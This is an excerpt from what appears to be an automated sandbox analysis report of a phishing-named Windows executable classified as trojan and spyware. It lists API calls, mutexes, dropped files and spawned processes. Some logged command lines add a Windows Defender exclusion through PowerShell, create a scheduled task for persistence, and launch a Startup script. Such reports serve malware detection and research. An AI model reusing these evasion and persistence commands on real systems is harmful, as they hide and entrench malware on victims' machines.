                        Source: 117.0.5938.132_chrome_installer.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: plugin-container.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: jabswitch.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: private_browsing.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: java-rmi.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: updater.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: java.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: Au3Info.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: Au3Info_x64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AutoIt3Help.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: elevation_service.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: maintenanceservice.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: 7z.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: 7zFM.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: javacpl.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: javaw.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: javaws.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: jjs.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: jp2launcher.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: keytool.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: kinit.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: klist.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: ktab.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: orbd.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: elevation_service.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: 7zG.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: pack200.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: policytool.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: rmid.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: rmiregistry.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: servertool.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: ssvagent.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: tnameserv.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: unpack200.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: ie_to_edge_stub.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: cookie_exporter.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: Acrobat.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AcrobatInfo.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: identity_helper.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: setup.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: msedgewebview2.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: msedge_proxy.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: msedge_pwa_launcher.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: notification_click_helper.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: pwahelper.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: msedge_proxy.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: pwahelper.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: MicrosoftEdgeUpdate.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: acrobat_sl.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AcroBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AcroCEF.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: SingleClientServicesUpdater.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AcroCEF.exe0.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: MicrosoftEdgeUpdateBroker.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: MicrosoftEdgeUpdateComRegisterShell64.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: MicrosoftEdgeUpdateCore.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: MicrosoftEdgeUpdateOnDemand.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: MicrosoftEdgeUpdateSetup.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AppVDllSurrogate.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: AppVDllSurrogate32.exe.3.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                        Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@32/146@26/10
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0044CE7A GetLastError,FormatMessageW,0_2_0044CE7A
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0043AB84 AdjustTokenPrivileges,CloseHandle,0_2_0043AB84
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0043B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_0043B134
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0044E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_0044E1FD
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00446532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00446532
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0045C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_0045C18C
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_0040406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_0040406B
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeCode function: 0_2_00ADCBD0 StrStrIW,CloseHandle,StrStrIW,CloseServiceHandle,OpenServiceW,StrStrIW,_wcslen,ChangeServiceConfigW,StrStrIW,StrStrIW,CloseServiceHandle,CloseHandle,StartServiceW,0_2_00ADCBD0
                        Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\maintenanceservice.logJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile created: C:\Users\user\AppData\Roaming\90fdfad63d8f4c72.binJump to behavior
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMutant created: NULL
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-90fdfad63d8f4c72-inf
                        Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exeMutant created: \Sessions\1\BaseNamedObjects\Phoenix_Clipper_666
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Multiarch.m0yv-90fdfad63d8f4c7273779169-b
                        Source: C:\Windows\System32\alg.exeMutant created: \BaseNamedObjects\Global\Multiarch.m0yv-90fdfad63d8f4c729ea72c54-b
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3652:120:WilError_03
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile created: C:\Users\user\AppData\Local\Temp\aut7AD4.tmpJump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: server01.exe, 0000000F.00000002.3345167854.000000000413D000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 0000000F.00000002.3330930022.0000000003220000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 0000000F.00000002.3330930022.000000000320C000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 0000000F.00000002.3330930022.00000000031FE000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 0000000F.00000002.3330930022.000000000322D000.00000004.00000800.00020000.00000000.sdmp, server01.exe, 0000000F.00000002.3330930022.00000000031EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeFile read: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeJump to behavior
                        Source: unknownProcess created: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe "C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe"
                        Source: unknownProcess created: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe"
                        Source: unknownProcess created: C:\Windows\System32\alg.exe C:\Windows\System32\alg.exe
                        Source: unknownProcess created: C:\Windows\System32\AppVClient.exe C:\Windows\system32\AppVClient.exe
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeProcess created: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe "C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe"
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe"
                        Source: unknownProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe "C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe"
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeProcess created: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"
                        Source: unknownProcess created: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe "C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe"
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe"
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Users\user\AppData\Local\Temp\server01.exe "C:\Users\user\AppData\Local\Temp\server01.exe"
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:00 /du 23:59 /sc daily /ri 1 /f
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Grinnellia.vbs"
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"
                        Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeProcess created: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe "C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeProcess created: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"Jump to behavior
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe "C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe" Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Users\user\AppData\Local\Temp\server01.exe "C:\Users\user\AppData\Local\Temp\server01.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /tn AccSys /tr "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe" /st 13:00 /du 23:59 /sc daily /ri 1 /f
                        Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exeProcess created: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe "C:\Users\user\AppData\Roaming\ACCApi\apihost.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"
                        Source: C:\Users\user\AppData\Local\Dunlop\Grinnellia.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\Dunlop\Grinnellia.exe"
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSection loaded: wsock32.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSection loaded: version.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\Desktop\PO #09465610_GQ 003745_SO-242000846.exeSection loaded: ntmarta.dllJump to behavior
